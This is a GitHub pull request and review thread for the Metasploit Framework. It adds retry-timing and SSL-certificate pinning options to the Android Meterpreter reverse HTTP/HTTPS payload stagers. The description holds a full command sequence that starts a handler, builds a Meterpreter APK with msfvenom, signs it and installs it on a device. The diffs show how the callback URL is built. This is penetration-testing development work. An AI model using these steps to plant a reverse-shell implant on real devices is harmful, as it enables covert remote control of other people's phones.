### PR TITLE
add support for HandlerSSLCert, SessionRetryTotal and SessionRetryWait on Android

### PR DESCRIPTION
**Pull request by timwr**
This change adds support for the SessionRetryTotal and SessionRetryWait advanced options.
To make this work the android meterpreter payload has to run on a single thread, otherwise we end up spawning multiple sessions (one every SessionRetryWait period).
This requires https://github.com/rapid7/metasploit-javapayload/pull/36 to work correctly.
Verification:
- [x] Set a non-default value for SessionRetryTotal and SessionRetryWait and ensure the payload waits the SessionRetryWait second period between retries for up to a total of SessionRetryTotal seconds.
- [x] Use the `set_timeouts -w 60` command within the session to set the SessionRetryWait. If you kill connection or handler the payload should take 60 seconds to reconnect.
- [x] Validate the HandlerSSLCert parameter like so:

```
# generate two different certs, e.g
$ ./tools/msf_irb_shell
>> c1 = Rex::Socket::SslTcpServer.ssl_generate_certificate
>> File.open("correct.pem", "wb"){|fd| fd.puts c1[0].to_s; fd.puts c1[1].to_s }
>> c2 = Rex::Socket::SslTcpServer.ssl_generate_certificate
>> File.open("incorrect.pem", "wb"){|fd| fd.puts c2[0].to_s; fd.puts c2[1].to_s }
>> exit
# start a handler
./msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_https; set lhost $LHOST; set lport 4444; set HandlerSSLCert correct.pem; set StagerVerifySSLCert true; set ExitOnSession false; run -j"
# on a new shell, with an android device/emulator attached with adb
./msfvenom -p android/meterpreter/reverse_https LHOST=$LHOST LPORT=4444 StagerVerifySSLCert=true HandlerSSLCert=./correct.pem -o android.apk
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA android.apk androiddebugkey
adb install android.apk
adb shell am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
```
- [x] If the certificate on the handler and payload are different (e.g correct.pem and incorrect.pem) the payload will not connect. If they match the payload should connect as normal.

### CODE REVIEW

File: modules/payloads/stagers/android/reverse_http.rb [hunk 1]
```diff
@@ -24,30 +24,31 @@ def initialize(info = {})
...
+    uri_req_len = 30 + rand(256-30)
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
+
+    lurl = "ZZZZhttp://#{datastore["LHOST"]}"
+    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    lurl << "/"
+    lurl << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
```
Comment (hmoore-r7) [inline modules/payloads/stagers/android/reverse_http.rb]: This needs to be using the UUID methods and mixin as well.

File: modules/payloads/stagers/android/reverse_https.rb [hunk 2]
```diff
@@ -24,30 +24,39 @@ def initialize(info = {})
...
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
 
-    jar = Rex::Zip::Jar.new
+    lurl = "ZZZZhttps://#{datastore["LHOST"]}"
+    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    lurl << "/"
+    lurl << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
```
Comment (hmoore-r7) [inline modules/payloads/stagers/android/reverse_https.rb]: Same as above (re: UUID)

**Comment by hmoore-r7** [comment]
Instead of calling the URI methods directly, please include the UUID payload mixin and call the UUID-aware methods instead. For example: 
 * https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_http.rb#L7
 * https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_http.rb#L25
 * https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_http.rb#L100

**Comment by hmoore-r7** [comment]
Without this, the UUID stuff won't work

**Comment by bcook-r7** [comment]
Hey @timwr , I have been doing more testing of the latest android meterpreter, and have run into a problem. My test devices include 2.3, 4.2 and 5.1. 5.1 works fine with all of the modes, but the 4.2 and 2.3 device (actually, an HTC G2 I switch firmwares on), doesn't stage with the payload from rapid7/metasploit-javapayload#36 and this PR.

I have an integration branch here: https://github.com/bcook-r7/metasploit-framework/tree/land-5366-android-retry with the updated metasploit-payloads gem and some tweaks to fix the binary usage. At first I thought there was a gem issue, but trying it even before the gem integration, I just cannot get it to work on older Android revs. master works fine though.

Any clues? logcat shows this on a non-working system:
```
D/dalvikvm( 4761): DexOpt: load 3ms, verify+opt 2ms, 98836 bytes
D/dalvikvm( 4747): DexOpt: --- END 'payload.jar' (success) ---
D/dalvikvm( 4747): DEX prep '/data/data/com.metasploit.stage/files/payload.jar': unzip in 0ms, rewrite 116ms
D/dalvikvm( 4747): DexOpt: --- BEGIN 'met.jar' (bootstrap=0) ---
D/dalvikvm( 4763): DexOpt: load 8ms, verify+opt 49ms, 331300 bytes
D/dalvikvm( 4747): DexOpt: --- END 'met.jar' (success) ---
D/dalvikvm( 4747): DEX prep '/data/data/com.metasploit.stage/files/met.jar': unzip in 3ms, rewrite 159ms
```

Actually, I'd love it if you could check out my integration branch above and verify if it works on your setup. I can submit a PR if it helps.

**Comment by timwr** [comment]
@bcook-r7 I was able to reproduce and fix the issue. I also tested your integration branch out and it works perfectly, great work.
Many thanks for your help and sorry for the inconvenience.

**Comment by bcook-r7** [comment]
Looks good, thanks @timwr . Merging payload fixes now for more testing.

**Comment by bcook-r7** [comment]
hah - cross-linked pr auto-closed this.

**Comment by bcook-r7** [comment]
Added 64e86165ef804681514652695f403f4c922e7793 and 449ce32f0770650d52fc63be44f61084d0dc7cb4 - thanks.

**Comment by bcook-r7** [comment]
This merge commit also rolls in the other meterpreter Android improvements, namely https://github.com/rapid7/metasploit-javapayload/pull/38 and https://github.com/rapid7/metasploit-javapayload/pull/37

**Pull request merged**